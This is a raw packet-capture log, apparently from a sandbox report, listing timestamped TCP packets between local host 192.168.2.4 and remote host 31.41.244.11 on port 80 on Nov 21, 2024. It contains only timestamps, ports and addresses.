                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.470223904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.470274925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.470325947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.479435921 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.479473114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.479509115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.479540110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.487809896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.487867117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.487971067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.488019943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.526808023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.526871920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.526904106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.526931047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.530630112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.530678988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.530745029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.530796051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.538363934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.538427114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.538546085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.538613081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.546102047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.546163082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.546224117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.546274900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.551933050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.551992893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.552016973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.552071095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.557753086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.557823896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.557904959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.557954073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.563888073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.563947916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.564028978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.564081907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.570516109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.570571899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.570635080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.570683002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.576653004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.576713085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.576775074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.576937914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.582592964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.582698107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.582772017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.582823038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.588481903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.588537931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.588541031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.588582039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.594687939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.594743013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.594870090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.594930887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.601238966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.601295948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.601432085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.601481915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.606868029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.606920958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.607028961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.607186079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.611730099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.611783981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.611798048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.611833096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.617252111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.617320061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.617444038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.617496967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.622311115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.622366905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.622402906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.622448921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.627084017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.627142906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.676934958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.677026033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.677073002 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.677103996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.679603100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.679671049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.679722071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.679781914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.685595036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.685672998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.685739040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.685802937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.690907955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.690978050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.691041946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.691099882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.696517944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.696595907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.696643114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.696712971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.702157974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.702215910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.702344894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.707860947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.707918882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.707937956 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.707978010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.713442087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.713519096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.713603020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.713663101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.719079971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.719141960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.719182014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.719233036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.724389076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.724452019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.724546909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.724605083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.729604006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.729665041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.729710102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.729772091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.734431982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.734494925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.734507084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.734565973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.737374067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.737433910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.737519026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.737576008 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.740370989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.740407944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.740428925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.740456104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.743514061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.743585110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.743638039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.743688107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.746082067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.746154070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.746216059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.746269941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.748924971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.748981953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.749046087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.749094963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.751661062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.751718044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.751792908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.751851082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.754512072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.754580021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.754642963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.754692078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.757246971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.757302999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.757376909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.757424116 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.760055065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.760142088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.760155916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.760215998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.762741089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.762803078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.762826920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.762876987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.765516043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.765569925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.765578032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.765621901 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.768305063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.768388987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.768451929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.768507957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.771198034 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.771233082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.771286964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.771317959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.773848057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.773885012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.773932934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.773956060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.776578903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.776648045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.776715040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.776778936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.779303074 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.779385090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.779490948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.779560089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.782090902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.782164097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.782197952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.782255888 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.784861088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.784923077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.784969091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.785171986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.787606955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.787681103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.787745953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.787805080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.790466070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.790564060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.790585041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.790617943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.793306112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.793380022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.793437958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.793498039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.796668053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.796731949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.796788931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.796849012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.798753977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.798824072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.798882008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.798935890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.801424980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.801487923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.887137890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.887204885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.887336016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.887387991 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.888222933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.888277054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.888335943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.888386965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.890314102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.890366077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.890975952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.891031027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.891094923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.891135931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.893170118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.893225908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.893228054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.893275023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.895477057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.895540953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.895562887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.895616055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.897252083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.897310019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.897371054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.897420883 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.899275064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.899339914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.899404049 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.899460077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.901279926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.901330948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.901335001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.901381969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.903228045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.903284073 CET4977080192.168.2.431.41.244.11
